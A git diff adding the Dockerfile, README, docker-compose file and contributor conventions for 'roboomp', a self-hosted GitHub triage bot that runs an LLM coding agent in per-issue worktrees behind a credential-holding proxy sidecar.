aliases — invoke directly: + +``` +docker compose --project-directory python/robomp exec robomp robomp triage owner/repo#N +docker compose --project-directory python/robomp exec robomp robomp replay <delivery_id> +docker compose --project-directory python/robomp exec robomp robomp status +docker compose --project-directory python/robomp exec robomp robomp cleanup owner/repo#N +``` + +HTTP / sqlite / webhook inspection is unaliased — use `curl http://localhost:${ROBOMP_BIND_PORT:-8080}/{healthz,readyz,events,issues}` and `docker compose --project-directory python/robomp exec robomp sqlite3 /data/robomp.sqlite` directly. + +Lint + format: TypeScript via Biome (config in `biome.json`), Python via Ruff (config in `pyproject.toml`). Root recipes cover both languages — `bun run lint` / `bun run fix` apply to the whole monorepo including roboomp. `bun run lint:py` / `bun run fix:py` scope to Python only. + +## Code Conventions & Common Patterns + +- **Python ≥3.11**, container is 3.12-slim. `from __future__ import annotations` is the norm; type hints are mandatory on public functions. +- **Records**: prefer `@dataclass(slots=True, frozen=True)` for immutable value types (see `github_client.IssueInfo`, `sandbox.Workspace`, `db.EventRow`). +- **Async style**: FastAPI handlers and `queue.WorkerPool` are async. `worker.run_task` is **synchronous** and runs in a worker thread because `omp-rpc` is blocking — keep it that way; don't try to async it. CLI commands wrap with `asyncio.run`. +- **Config**: `pydantic-settings` `Settings` in `config.py` with `ROBOMP_*` env prefix (e.g. `ROBOMP_MAX_CONCURRENCY`, `ROBOMP_REPO_ALLOWLIST`). Access only via `get_settings()` (`@cache` singleton). Tests must call `reset_settings_cache()` after mutating env. +- **Dependency injection**: pass `Settings`, `Database`, `GitHubClient`, `SandboxManager` explicitly into `create_app()`, `WorkerPool`, and `ToolBindings`. No module-level globals other than the singleton accessors (`get_settings`, `get_database`). +- **State**: SQLite (`db.Database`) is the source of truth for `events`, `issues`, `tool_calls`. Thread-safe via an internal `_lock`; `BEGIN IMMEDIATE` for claim contention. In-memory state is only the `_inflight` set in `WorkerPool`. +- **Error handling**: custom exception types (`GitHubError` with `retry_after`, `GitCommandError`, `InvalidIssueRef`, `RpcCommandError`). `sandbox.redact_credentials()` strips `user:pass@` from any URL before it lands in logs, audit rows, or exception messages. **Never** include credentialed URLs in error strings. +- **Logging**: structured JSON via `logging_config.JsonFormatter`. Use `logger.info("event", extra={...})`; do not collide with `_RESERVED` keys. Configure once via `configure_logging()`. +- **Host tools** (`host_tools.py`): every tool is built from a per-task `ToolBindings` closure and audits through `_audit()` into `tool_calls`. Audit only ever sees agent-supplied args, never internal credentials. New tools follow the same pattern: validate args → call `GitHubClient` / `SandboxManager` → return structured dict → audit. +- **Naming**: snake_case for everything Python; module names singular nouns; test files `test_<module>.py`; test functions `test_<action>_<condition>`. +- **Prompts**: edit `src/prompts/*.md`. Variables use `{{path.to.field}}`; resolution is `persona._lookup`. The package install includes them as data files — adding a new prompt requires no other registration. + +## Important Files + +- `src/server.py` — FastAPI app, `/webhook/github`, `/healthz`, `/readyz`, `/events`, `/issues`, manual triage/replay endpoints, dashboard at `/`. +- `src/queue.py` — `WorkerPool` dispatcher and `_inflight` serialization. +- `src/tasks.py` — the five task entry points the dispatcher calls. +- `src/worker.py` — synchronous omp RPC driver, prompt assembly via `persona`. +- `src/host_tools.py` — agent's GitHub surface; tool list: `classify_issue`, `set_issue_labels`, `gh_post_comment`, `repro_record`, `gh_push_branch`, `gh_open_pr`, `gh_request_review`, `mark_unable_to_reproduce`, `abort_task`, `fetch_issue_thread`. +- `src/sandbox.py` — clone pool + worktree lifecycle, `GitCommandError`, credential redaction. +- `src/github_client.py` — typed httpx client; parses webhook payloads into `IssueInfo` / `CommentInfo` / `PullRequestInfo`. +- `src/github_events.py` — routing and HMAC verification. +- `src/db.py` — sqlite schema and DAOs (`record_event`, `claim_next_event`, `upsert_issue`, `log_tool_call`). +- `src/config.py` — `Settings` model and `get_settings()`. +- `src/cli.py` — Click CLI (`serve`, `triage`, `replay`, `status`, `cleanup`). +- `src/dashboard.py` — single-page HTML dashboard served from `/`. +- `pyproject.toml` — packaging + pytest config (`asyncio_mode = "auto"`, `testpaths = ["tests"]`). +- `Dockerfile` — slim runtime; consumes `oh-my-pi/artifacts:dev` (built from `/work/pi/Dockerfile`) for `pi_natives.linux-*.node` + `omp_rpc-*.whl`. Tini entrypoint, exposes `8080`, `VOLUME /data`. +- `docker-compose.yml` — `build.args.PI_ARTIFACTS_IMAGE`, mounts `$PI_ROOT:/work/pi:ro`, `./data:/data`, `~/.omp/agent/models.container.yml:ro` (mapped to `models.yml` inside the container — kept separate from the host's `~/.omp/agent/models.yml` so the host omp doesn't pick up gateway routing intended only for the container), `extra_hosts: llm-gateway.internal:host-gateway`. +- `entrypoint.sh` — validates `PI_ROOT`, creates `/data/{workspaces,logs}` + build caches. +- `.env.example` — authoritative list of required runtime env vars. +- `README.md` — full architecture + operational reference. Authoritative for end-to-end flow, host-tool spec, security posture, and configuration reference. + +## Runtime/Tooling Preferences + +- **Python**: 3.11+ source target, 3.12 in container. Setuptools src layout (`pyproject.toml` `[tool.setuptools] package-dir = { "" = "src" }`). +- **Package manager**: `pip` only. No poetry / uv / pdm files; don't introduce one. +- **Task runner**: `bun` (root `package.json` `scripts`). Always reach for an existing `bun run` recipe before invoking `docker compose` or `pytest` directly. +- **Container runtime**: Docker Compose v2. The image embeds Bun 1.3.14 + a rustup launcher and exposes `omp` via a `/usr/local/bin/omp` shim; `ROBOMP_OMP_COMMAND=omp` should not need changing. +- **Required env** (set in `.env`, see `.env.example`): `GITHUB_WEBHOOK_SECRET`, `ROBOMP_BOT_LOGIN`, `ROBOMP_GIT_AUTHOR_NAME`, `ROBOMP_GIT_AUTHOR_EMAIL`, `ROBOMP_REPO_ALLOWLIST`, plus model knobs (`ROBOMP_MODEL`, `ROBOMP_THINKING`, optional `ROBOMP_PROVIDER`) and rate-limit / concurrency / timeout overrides. **GitHub auth is mode-exclusive**: either set `ROBOMP_GH_PROXY_URL` + `ROBOMP_GH_PROXY_HMAC_KEY` (gh-proxy mode; PAT lives only in the sidecar container — the bundled compose default), or set `GITHUB_TOKEN` directly (single-process PAT mode). `Settings._validate_proxy_or_pat` rejects a `.env` that sets both. +- **PI_ROOT resolution**: roboomp lives inside the oh-my-pi monorepo at `python/robomp/`. `bun run robomp:pi-artifacts` builds the parent monorepo (`../..`) as its docker build context, and `docker-compose.yml` mounts that same path read-only at `/work/pi`. Override `PI_ROOT` only when pointing the build/mount at a different oh-my-pi checkout. Inside the container the path is always `/work/pi`. Build invalidation stays bounded: Python-only edits in roboomp never trigger a natives recompile. +- **Forbidden**: no docker-in-docker, no extra service containers, no new background workers outside `WorkerPool`. The container itself is the isolation boundary; per-issue isolation is the git worktree. + +## Testing & QA + +- **Framework**: `pytest` with `asyncio_mode = "auto"` (`pyproject.toml`). HTTP mocking with `httpx.MockTransport`; `respx` is available but only `MockTransport` is used in-tree — match that style. +- **Fixtures** (`tests/conftest.py`): + - `env` — `monkeypatch`-sets all required `ROBOMP_*` env vars and calls `reset_settings_cache()` before/after. + - `settings` — invokes `ensure_paths()` for sqlite/workspace dirs. + - `db` — isolated `tmp_path/test.sqlite` `Database`; tests must `database.close()` in teardown when bypassing this. +- **Isolation rules**: any test mutating env via `monkeypatch.setenv` MUST also call `reset_settings_cache()` to invalidate the `@cache`d `get_settings()`. +- **Async tests**: `test_github_client.py` and `test_host_tools.py` spin custom event loops in background threads to bridge sync-style tests with async client code. Prefer `pytest-asyncio` `auto` mode (`async def test_*`) for new tests; only fall back to the loop helpers if matching the surrounding file's style. +- **Mocking**: never patch internals; inject test doubles via `httpx.MockTransport` for HTTP and via the `db` / `tmp_path` fixtures for storage. Sandbox tests use a real local bare repo as the upstream. +- **Integration**: `tests/test_worker_smoke.py` is gated by `ROBOMP_INTEGRATION=1` (uses `pytestmark.skipif`) and needs `omp` on `PATH`. Don't enable it in default `bun run test:py`. +- **Coverage expectation**: ~80 unit tests currently. New code with a control-flow branch needs a test covering it; new host tools need at minimum a happy path + one validation-failure path mirroring `test_host_tools.py`. Test logical behavior (assertions on observable effects in DB / HTTP requests), not literal strings or default config values. diff --git a/python/robomp/Dockerfile b/python/robomp/Dockerfile new file mode 100644 index 000000000..6ba771cfd --- /dev/null +++ b/python/robomp/Dockerfile @@ -0,0 +1,132 @@ +# syntax=docker/dockerfile:1.7-labs +############################################################################### +# roboomp — orchestrator image +# +# Build is split across three stages: +# +# 1) pi-artifacts — pull a pre-built `oh-my-pi/artifacts:dev` image (built +# separately from /work/pi/Dockerfile, see `bun run robomp:pi-artifacts`): +# - pi_natives.linux-<arch>.node → /opt/bun/bin/ (the pi loader probes here) +# - omp_rpc-*.whl → pip install +# 2) web-builder — Bun + Vite compile the SolidJS dashboard bundle from +# the `web/` workspace into `web/dist/`. +# 3) runtime — slim Python 3.12 image that copies in (1) the natives +# + wheel, (2) the dashboard bundle, and (3) the roboomp source. +# +# At runtime the full pi checkout is mounted read-only at /work/pi so `omp` +# (the Bun shim below) executes the coding-agent source directly. The image +# itself stays slim: no rust compile, no pi source tree, no node_modules. +############################################################################### + +ARG PI_ARTIFACTS_IMAGE=oh-my-pi/artifacts:dev + +############################ +# 1) pi-artifacts — pull the pre-built natives + omp-rpc wheel. +############################ +FROM ${PI_ARTIFACTS_IMAGE} AS pi-artifacts + +############################ +# 2) web-builder — Bun + Vite, builds the SolidJS dashboard bundle. +############################ +FROM oven/bun:1.3.14-slim AS web-builder +WORKDIR /work +# Build context is the pi monorepo root, so the web-builder stage installs +# from pi's bun.lock — that's how `web/package.json` resolves its `catalog:` +# references against the workspace-wide catalog declared at pi root. +COPY package.json bun.lock ./ +COPY python/robomp/web/package.json ./python/robomp/web/package.json +RUN bun install --filter robomp-web +COPY --exclude=node_modules --exclude=dist python/robomp/web/ ./python/robomp/web/ +RUN bun --cwd=python/robomp/web run build + +############################ +# 3) runtime — slim image with everything roboomp needs at boot. +############################ +FROM python:3.12-slim-bookworm AS runtime + +ENV PYTHONDONTWRITEBYTECODE=1 \ + PYTHONUNBUFFERED=1 \ + PIP_NO_CACHE_DIR=1 \ + PIP_DISABLE_PIP_VERSION_CHECK=1 \ + BUN_INSTALL=/opt/bun \ + PI_ROOT=/work/pi \ + # Persistent build caches under the /data volume so cargo target and + # rustup toolchains are shared across every per-issue worktree and + # survive container restarts. Bun's install cache is deliberately + # workspace-private at runtime; bun chmod/chown behavior makes a shared + # cross-slot cache unreliable. + CARGO_HOME=/data/cache/cargo \ + CARGO_TARGET_DIR=/data/cache/cargo-target \ + RUSTUP_HOME=/data/cache/rustup \ + PATH=/opt/bun/bin:/usr/local/cargo/bin:/usr/local/bin:/usr/bin:/bin + +RUN apt-get update \ + && apt-get install -y --no-install-recommends \ + git curl ca-certificates unzip openssh-client tini sqlite3 \ + build-essential pkg-config libssl-dev \ + && rm -rf /var/lib/apt/lists/* + +ARG BUN_VERSION=1.3.14 +RUN curl -fsSL https://bun.sh/install | bash -s "bun-v${BUN_VERSION}" \ + && /opt/bun/bin/bun --version + +# Rustup launcher. Install the cargo/rustc/rustup proxies into a fixed +# image path; the real toolchain is *not* baked in — it's installed +# lazily into RUSTUP_HOME (=/data/cache/rustup) on the first `cargo` +# invocation inside a worktree, driven by pi's rust-toolchain.toml. +# That keeps the image small while sharing the toolchain across reboots. +RUN curl -fsSL https://sh.rustup.rs -o /tmp/rustup-init.sh \ + && CARGO_HOME=/usr/local/cargo RUSTUP_HOME=/usr/local/rustup-bootstrap \ + sh /tmp/rustup-init.sh -y --no-modify-path --default-toolchain none --profile minimal \ + && rm -f /tmp/rustup-init.sh \ + && rm -rf /usr/local/rustup-bootstrap \ + && /usr/local/cargo/bin/rustup --version + +# pi-natives addon: pi's loader probes /opt/bun/bin as a fallback path. +COPY --from=pi-artifacts /out/pi_natives.linux-*.node /opt/bun/bin/ + +# omp-rpc Python wheel. +COPY --from=pi-artifacts /out/*.whl /tmp/wheels/ +RUN pip install /tmp/wheels/omp_rpc-*.whl && rm -rf /tmp/wheels + +WORKDIR /app + +# `omp` shim — calls into the mounted pi checkout via Bun. +RUN printf '%s\n' \ + '#!/usr/bin/env bash' \ + 'set -euo pipefail' \ + ': "${PI_ROOT:=/work/pi}"' \ + 'if [ ! -d "$PI_ROOT/packages/coding-agent" ]; then' \ + ' echo "roboomp: PI_ROOT=$PI_ROOT does not look like a pi checkout" >&2' \ + ' exit 127' \ + 'fi' \ + 'exec bun "$PI_ROOT/packages/coding-agent/src/cli.ts" "$@"' \ + > /usr/local/bin/omp \ + && chmod +x /usr/local/bin/omp + +# roboomp itself. Drop the Vite-built dashboard into the package tree before +# `pip install` so it lands in the installed wheel (`static/**/*` is declared +# as package-data in pyproject.toml). +COPY python/robomp/pyproject.toml ./ +COPY python/robomp/src/ ./src/ +COPY --from=web-builder /work/python/robomp/web/dist/ ./src/static/ +RUN pip install --upgrade pip \ + && pip install \ + "fastapi>=0.112" "uvicorn[standard]>=0.30" "httpx>=0.27" \ + "pydantic>=2.6" "pydantic-settings>=2.2" "python-dotenv>=1.0" \ + "click>=8.1" \ + && pip install --no-deps . + +RUN mkdir -p /srv/agent-home/.agent /srv/agent-home/.omp/agent \ + && mkdir -p /srv/agent-home-stage/.agent /srv/agent-home-stage/.omp/agent \ + && printf '[install]\nbackend = "copyfile"\n' > /srv/agent-home/.bunfig.toml + +COPY python/robomp/entrypoint.sh /usr/local/bin/robomp-entrypoint +RUN chmod +x /usr/local/bin/robomp-entrypoint + +VOLUME ["/data"] +EXPOSE 8080 +EXPOSE 8081 + +ENTRYPOINT ["/usr/bin/tini", "--", "/usr/local/bin/robomp-entrypoint"] +CMD ["python", "-m", "robomp", "serve"] diff --git a/python/robomp/README.md b/python/robomp/README.md new file mode 100644 index 000000000..16b9a9804 --- /dev/null +++ b/python/robomp/README.md @@ -0,0 +1,217 @@ +# roboomp + +Self-hosted GitHub triage bot. Drives [`omp --mode rpc`](https://github.com/can1357/oh-my-pi) +as a subprocess against a per-issue git worktree, then writes back to GitHub +through a sidecar that holds the PAT. + +On `issues.opened` in an allowlisted repo it classifies the issue, labels it, +and branches: + +- `bug` / `documentation` → reproduce, fix on a fresh branch, open a PR whose + body has `## Repro` / `## Cause` / `## Fix` / `## Verification` and + `Fixes #N`. +- `question` → one comment, suffixed with a 👎-to-keep-open prompt; if the + issue author doesn't react 👎 within `ROBOMP_QUESTION_AUTOCLOSE_HOURS` + (default 4), the issue auto-closes as `state_reason=completed`. A follow-up + comment or external close cancels the schedule synchronously. +- `enhancement` / `proposal` → one comment, no PR. +- `invalid` / `duplicate` → one brief comment. + +Follow-up issue comments and PR review comments resume the same omp session +(`--continue` against the persisted JSONL transcript). On orchestrator +restart, in-flight events are re-queued and resume the same way. + +## Architecture + +Two containers, one trust boundary: + +- **robomp** — FastAPI + sqlite event queue + `WorkerPool` running `omp` in + per-issue worktrees under `/data/workspaces/`. Holds the HMAC key, never + the PAT. +- **gh-proxy** — sibling on an `internal: true` network. Holds `GITHUB_TOKEN`, + verifies HMAC-signed requests from robomp, executes REST + `git push`. + Only egress to `api.github.com`. + +Flow: webhook → HMAC verify → `github_events.route` → sqlite `events` +(dedup on `X-GitHub-Delivery`) → `WorkerPool` claims under +`BEGIN IMMEDIATE` with an in-process `_inflight` set per `(owner, repo, n)` +→ `sandbox.ensure_workspace` produces a worktree on `farm/<8hex>/<slug>` +→ `worker.run_task` spawns `omp --mode rpc` with `cwd=worktree`, +persistent `session_dir`, model randomly drawn from `ROBOMP_MODEL` (CSV). + +The agent uses omp's built-in tools (`read`/`edit`/`bash`/`lsp`, scoped to +the worktree) plus the host tools in `src/host_tools.py` — the +exclusive surface for GitHub writes. Every host-tool invocation is audited +into the `tool_calls` table with credential-redacted args and results. + +## Setup + +Requires Docker Compose v2 and a LiteLLM-style proxy on the host that your +`~/.omp/agent/models.container.yml` points at (mounted into the container as `models.yml`; kept under a separate filename on the host so the host omp doesn't route through the gateway). roboomp lives inside the oh-my-pi +monorepo at `python/robomp/`; both the docker build context and the +`/work/pi` bind mount default to the parent monorepo (`../..`). Override +`PI_ROOT` only if you want a different oh-my-pi checkout backing the build +and runtime. + +Bot account needs **Write** on every repo in `ROBOMP_REPO_ALLOWLIST`. A +fine-grained PAT with Contents / Issues / Pull requests RW + Metadata R is +enough. + +```bash +cp .env.example .env +$EDITOR .env +openssl rand -hex 32 # ROBOMP_GH_PROXY_HMAC_KEY +openssl rand -hex 32 # GITHUB_WEBHOOK_SECRET + +bun run robomp:pi-artifacts # build oh-my-pi/artifacts:dev (one-time / on pi change) +bun run robomp:build && bun run robomp:up +curl -fsS http://localhost:8080/healthz +``` + +The bundled `docker-compose.yml` runs in gh-proxy mode by default. To run +the orchestrator directly with the PAT in-process (host CLI, tests), +comment out `ROBOMP_GH_PROXY_URL` / `ROBOMP_GH_PROXY_HMAC_KEY` and set +`GITHUB_TOKEN`. The two modes are mutually exclusive (`config.py` +rejects a `.env` setting both). + +Build invalidation is bounded: editing roboomp Python touches only the +runtime layer; editing pi source rebuilds `oh-my-pi/artifacts:dev`, which +roboomp's Dockerfile consumes via `COPY --from=`. + +### Public URL + +roboomp does not ship a tunnel. Cloudflare, smee, ngrok are all fine. The +recommended ingress rule restricts the public hostname to +`/webhook/github` exactly; `/healthz`, `/events`, `/issues`, `/replay` +stay localhost-only. + +### GitHub webhook + +In *Settings → Webhooks*: payload URL `https://…/webhook/github`, content +type `application/json`, secret = `GITHUB_WEBHOOK_SECRET`, events = +*Issues, Issue comments, Pull requests, Pull request reviews, Pull +request review comments*. GitHub's `ping` should produce +`POST /webhook/github 202` within a second. + +### Configuration + +See `.env.example` for the authoritative variable list. The shipped +`docker-compose.yml` uses per-service `environment:` allowlists rather +than `env_file:`, so `GITHUB_TOKEN` only reaches the gh-proxy container. + +## CLI + +The container entrypoint is `python -m robomp serve`. Other commands run +inside the running container: + +```bash +docker compose exec robomp robomp triage owner/repo#123 # synthesize an issues.opened and wait +docker compose exec robomp robomp replay <delivery_id> # re-enqueue a stored event and wait +docker compose exec robomp robomp status # dump issues table +docker compose exec robomp robomp cleanup owner/repo#123 # force workspace removal, state=abandoned +``` + +`bun run robomp:…` shortcuts in the root `package.json` cover the common +lifecycle commands (`robomp:dev`, `robomp:build`, `robomp:up`, `robomp:down`, +`robomp:logs`, `robomp:restart`, `robomp:reset`). + +## Tests + +```bash +pytest -x tests/ # unit suite, no network +ROBOMP_INTEGRATION=1 pytest -x tests/test_worker_smoke.py +``` + +The integration test spawns a real `omp --mode rpc` against an +`httpx.MockTransport` GitHub and a local bare repo, so it needs `omp` on +`PATH`. `bun run test:py` runs the unit suite. + +## Security posture + +- `GITHUB_TOKEN` lives only in the gh-proxy container. The orchestrator + refuses to start if it sees `GITHUB_TOKEN` in its own environment. +- Orchestrator → gh-proxy is HMAC-SHA256 signed with a ±30s skew window + and constant-time compare. +- `git push` inside gh-proxy uses `git -c http.extraheader=…` with the + token passed through an ephemeral process env var; the remote URL in + `.git/config` stays token-free. +- gh-proxy has no host port. The `robomp_internal` network is + `internal: true` (no ingress, no egress); gh-proxy joins `default` + only to reach `api.github.com`. +- Agent subprocess env is scrubbed of `GITHUB_TOKEN` / + `ROBOMP_GH_PROXY_HMAC_KEY` / friends via `worker._SCRUBBED_ENV_KEYS`. +- Webhook signatures: bad sig → `401` (so GitHub stops retrying), never + `5xx`. +- `git` errors flow through `git_ops.GitCommandError` which redacts + `https://user:pw@host` to `https://***@host` from argv, stdout, stderr + before raising. `host_tools._audit` only records agent-supplied args. +- Pre-push gates (`gh_push_branch`): branch matches the workspace + branch, working tree clean, every commit on + `origin/<default>..HEAD` carries `ROBOMP_GIT_AUTHOR_NAME` + + `ROBOMP_GIT_AUTHOR_EMAIL`. +- Pre-PR gates (`gh_open_pr`): when the repo defines them, `bun run fix` + runs first (any diff auto-committed as `style: bun run fix`) and then + `bun check`. A failing `bun check` returns to the agent as + `RpcCommandError` for iteration. +- `gh_open_pr` validates `## Repro` / `## Cause` / `## Fix` / + `## Verification` headers and a `Fixes`/`Closes`/`Resolves #N` + reference before opening. + +## Operational notes + +- **One PR per issue.** Follow-up events push amendments to the same + `farm/<hex>/<slug>` branch. +- **No PR without a recorded repro.** Persona prompt requires + `repro_record`; `mark_unable_to_reproduce` closes the loop when + reproduction genuinely fails. +- **Crash recovery.** On startup, `db.reset_stuck_running()` flips + `running` rows back to `queued`. Existing `<session_dir>/*.jsonl` + triggers `--continue`. Drain bounded by + `ROBOMP_SHUTDOWN_DRAIN_TIMEOUT_SECONDS` (25s) + + `ROBOMP_SHUTDOWN_KILL_TIMEOUT_SECONDS` (5s); compose + `stop_grace_period: 30s` covers both. +- **Logs.** Structured JSON on stdout, rotated to + `/data/logs/robomp.log.jsonl`. +- **Inspection** (localhost only): `GET /events?limit=N`, + `GET /issues?limit=N`, `GET /healthz`, `GET /readyz`, and the + dashboard at `/`. + +## Troubleshooting + +| Symptom | Check | +|---|---| +| `401 invalid signature` | `GITHUB_WEBHOOK_SECRET` mismatch with the repo webhook config. | +| Container exits with `PI_ROOT … missing` | `/work/pi` mount empty inside the container; on the host either run `docker compose` from `python/robomp/` so `PI_ROOT` defaults to `../..`, or export `PI_ROOT` to a valid oh-my-pi checkout. | +| `git push: Authentication required` | Bot PAT lacks push, or `ROBOMP_BOT_LOGIN` ≠ PAT's account. | +| `refusing to push: commit author identity mismatch` | Some commit not authored as `ROBOMP_GIT_AUTHOR_*`. The error lists the offending shas; `git commit --amend --reset-author --no-edit`. | +| `refusing to push: working tree is dirty` | Uncommitted agent edits. Or just call `gh_open_pr`, which auto-commits `bun run fix` output. | +| `bun check failed before PR creation` | Fix the reported failure and retry `gh_open_pr`. | +| `Failed to load pi_natives` | Wrong arch / missing native. `bun run robomp:pi-artifacts` then `bun run robomp:build`. | +| `No API key found for <provider>` | `~/.omp/agent/models.container.yml` mount missing or provider id mismatch with `ROBOMP_MODEL`. | + +## Layout + +``` +src/ + server.py FastAPI app, /webhook/github, /events, /issues, /replay, dashboard at / + github_events.py verify_signature + route() + queue.py WorkerPool, dispatch loop, per-issue _inflight serialization + tasks.py triage_issue, handle_comment, handle_pr_conversation, handle_review, cleanup_workspace + worker.py synchronous omp RPC driver, prompt assembly, env scrubbing + host_tools.py classify_issue, set_issue_labels, gh_post_comment, repro_record, + gh_push_branch, gh_open_pr, gh_request_review, + mark_unable_to_reproduce, abort_task, fetch_issue_thread + sandbox.py clone pool + worktree lifecycle + github_client.py typed httpx client; webhook payload parsing + proxy_client.py GitHubProxyClient + HMAC signer + db.py sqlite schema + DAOs + config.py pydantic Settings; mode-exclusive PAT vs gh-proxy validation + cli.py serve / triage / replay / status / cleanup + prompts/ system_append.md + per-task kickoff templates +tests/ pytest unit suite + one ROBOMP_INTEGRATION=1 smoke test +web/ vite + solid dashboard, built into src/static/ +``` + +## License + +MIT. diff --git a/python/robomp/assets/icon.jpg b/python/robomp/assets/icon.jpg new file mode 100644 index 000000000..a66916545 Binary files /dev/null and b/python/robomp/assets/icon.jpg differ diff --git a/python/robomp/assets/icon.png b/python/robomp/assets/icon.png new file mode 100644 index 000000000..f666f35e2 Binary files /dev/null and b/python/robomp/assets/icon.png differ diff --git a/python/robomp/docker-compose.yml b/python/robomp/docker-compose.yml new file mode 100644 index 000000000..302a93281 --- /dev/null +++ b/python/robomp/docker-compose.yml @@ -0,0 +1,153 @@ +services: + # ─────────────────────────────────────────────────────────────────────────── + # roboomp orchestrator + # + # NOTE: `env_file:` is INTENTIONALLY ABSENT. We never want the gh-proxy's + # PAT (`GITHUB_TOKEN` in .env) to leak into this container's environment. + # Every variable below is an explicit allowlist; compose still reads `.env` + # for `${VAR}` interpolation, but only the keys listed here flow into the + # container. Adding a new secret means an explicit compose-level decision + # about which container is allowed to see it. + # ─────────────────────────────────────────────────────────────────────────── + robomp: + build: + # pi root: gives the web-builder stage access to the workspace + # bun.lock + catalog (web/package.json refs `catalog:` versions). + # python/robomp/data is excluded via pi's .dockerignore. + context: ../.. + dockerfile: python/robomp/Dockerfile + args: + # Tag of the pre-built artifacts image produced by `bun run robomp:pi-artifacts` + # (sources: pi root /Dockerfile). Override per-environment as needed. + PI_ARTIFACTS_IMAGE: oh-my-pi/artifacts:dev + image: robomp:dev + container_name: robomp + # Phase B (graceful shutdown): gives the orchestrator at least + # ROBOMP_SHUTDOWN_DRAIN_TIMEOUT_SECONDS + ROBOMP_SHUTDOWN_KILL_TIMEOUT_SECONDS + # before SIGKILL. Defaults: 25 + 5 = 30s. + stop_grace_period: 30s + restart: unless-stopped + environment: + # --- gh-proxy channel --- + # The orchestrator NEVER holds GITHUB_TOKEN; it talks to the sibling + # gh-proxy container over the internal-only network. + ROBOMP_GH_PROXY_URL: http://gh-proxy:8081 + ROBOMP_GH_PROXY_HMAC_KEY: ${ROBOMP_GH_PROXY_HMAC_KEY:?ROBOMP_GH_PROXY_HMAC_KEY must be set in .env} + + # --- webhook + identity --- + GITHUB_WEBHOOK_SECRET: ${GITHUB_WEBHOOK_SECRET:?GITHUB_WEBHOOK_SECRET must be set in .env} + ROBOMP_BOT_LOGIN: ${ROBOMP_BOT_LOGIN:?ROBOMP_BOT_LOGIN must be set in .env} + ROBOMP_GIT_AUTHOR_NAME: ${ROBOMP_GIT_AUTHOR_NAME:-} + ROBOMP_GIT_AUTHOR_EMAIL: ${ROBOMP_GIT_AUTHOR_EMAIL:?ROBOMP_GIT_AUTHOR_EMAIL must be set in .env} + ROBOMP_REPO_ALLOWLIST: ${ROBOMP_REPO_ALLOWLIST:?ROBOMP_REPO_ALLOWLIST must be set in .env} + ROBOMP_MAINTAINER_LOGINS: ${ROBOMP_MAINTAINER_LOGINS:-} + ROBOMP_REVIEWER_BOTS: ${ROBOMP_REVIEWER_BOTS:-} + + # --- model selection --- + ROBOMP_MODEL: ${ROBOMP_MODEL:-anthropic/claude-sonnet-4-6} + ROBOMP_PROVIDER: ${ROBOMP_PROVIDER:-} + ROBOMP_THINKING: ${ROBOMP_THINKING:-high} + + # --- runtime tuning --- + ROBOMP_MAX_CONCURRENCY: ${ROBOMP_MAX_CONCURRENCY:-8} + ROBOMP_TASK_TIMEOUT_SECONDS: ${ROBOMP_TASK_TIMEOUT_SECONDS:-2400} + ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS: ${ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS:-60} + ROBOMP_REQUEST_TIMEOUT_SECONDS: ${ROBOMP_REQUEST_TIMEOUT_SECONDS:-120} + ROBOMP_RATE_LIMIT_WINDOW_SECONDS: ${ROBOMP_RATE_LIMIT_WINDOW_SECONDS:-3600} + ROBOMP_RATE_LIMIT_DEFAULT: ${ROBOMP_RATE_LIMIT_DEFAULT:-3} + ROBOMP_RATE_LIMIT_CONTRIBUTOR: ${ROBOMP_RATE_LIMIT_CONTRIBUTOR:-10} + ROBOMP_RATE_LIMIT_UNLIMITED: ${ROBOMP_RATE_LIMIT_UNLIMITED:-} + ROBOMP_QUESTION_AUTOCLOSE_ENABLED: ${ROBOMP_QUESTION_AUTOCLOSE_ENABLED:-true} + ROBOMP_QUESTION_AUTOCLOSE_HOURS: ${ROBOMP_QUESTION_AUTOCLOSE_HOURS:-4} + ROBOMP_QUESTION_AUTOCLOSE_SCAN_SECONDS: ${ROBOMP_QUESTION_AUTOCLOSE_SCAN_SECONDS:-60} + ROBOMP_REPLAY_TOKEN: ${ROBOMP_REPLAY_TOKEN:-} + + # --- container-fixed paths --- + ROBOMP_OMP_COMMAND: omp + ROBOMP_WORKSPACE_ROOT: /data/workspaces + ROBOMP_SQLITE_PATH: /data/robomp.sqlite + ROBOMP_LOG_DIR: /data/logs + ROBOMP_BIND_HOST: ${ROBOMP_BIND_HOST:-0.0.0.0} + ROBOMP_BIND_PORT: ${ROBOMP_BIND_PORT:-8080} + PI_ROOT: /work/pi + depends_on: + gh-proxy: + condition: service_started + # Resolve `llm-gateway.internal` (used in /srv/agent-home/.omp/agent/models.yml) to the + # Docker host. The actual gateway listens on 127.0.0.1:4000 on the host; + # `host-gateway` is Docker's alias for the host bridge IP. + extra_hosts: + - "llm-gateway.internal:host-gateway" + networks: + - default + - robomp_internal + volumes: + - ${PI_ROOT:-../..}:/work/pi:ro + - robomp_data:/data + # Host agent config is mounted read-only under /srv/agent-home-stage + # with host-controlled permissions. The entrypoint copies it into + # root-owned, world-readable files under /srv/agent-home; the agent + # subprocess runs with HOME=/srv/agent-home, so ~/.omp and ~/.agent + # resolve there without exposing mutable host mounts. + - ${HOME}/.omp/agent/models.container.yml:/srv/agent-home-stage/.omp/agent/models.yml:ro + - ${HOME}/.agent/AGENT.md:/srv/agent-home-stage/.agent/AGENTS.md:ro + - ${HOME}/.agent/rules:/srv/agent-home-stage/.agent/rules:ro + ports: + - "127.0.0.1:6543:8080" + + # ─────────────────────────────────────────────────────────────────────────── + # gh-proxy + # + # The only container that ever holds GITHUB_TOKEN. Reachable only from the + # orchestrator on the internal-only network — no host port mapping. Every + # request must carry a valid HMAC signature (ROBOMP_GH_PROXY_HMAC_KEY). + # `env_file:` is INTENTIONALLY ABSENT for the same reason: the explicit + # allowlist below is the only place where any var lands in this container. + # ─────────────────────────────────────────────────────────────────────────── + gh-proxy: + image: robomp:dev + container_name: gh-proxy + restart: unless-stopped + command: ["python", "-m", "robomp.proxy", "serve"] + environment: + # PAT: lives ONLY here. The orchestrator's compose block refuses to + # let this var into its container. + GITHUB_TOKEN: ${GITHUB_TOKEN:?GITHUB_TOKEN must be set in .env} + # Shared with the orchestrator: HMAC verification key. + ROBOMP_GH_PROXY_HMAC_KEY: ${ROBOMP_GH_PROXY_HMAC_KEY:?ROBOMP_GH_PROXY_HMAC_KEY must be set in .env} + # The proxy reuses the SandboxManager pool layout under /data/workspaces. + ROBOMP_WORKSPACE_ROOT: /data/workspaces + 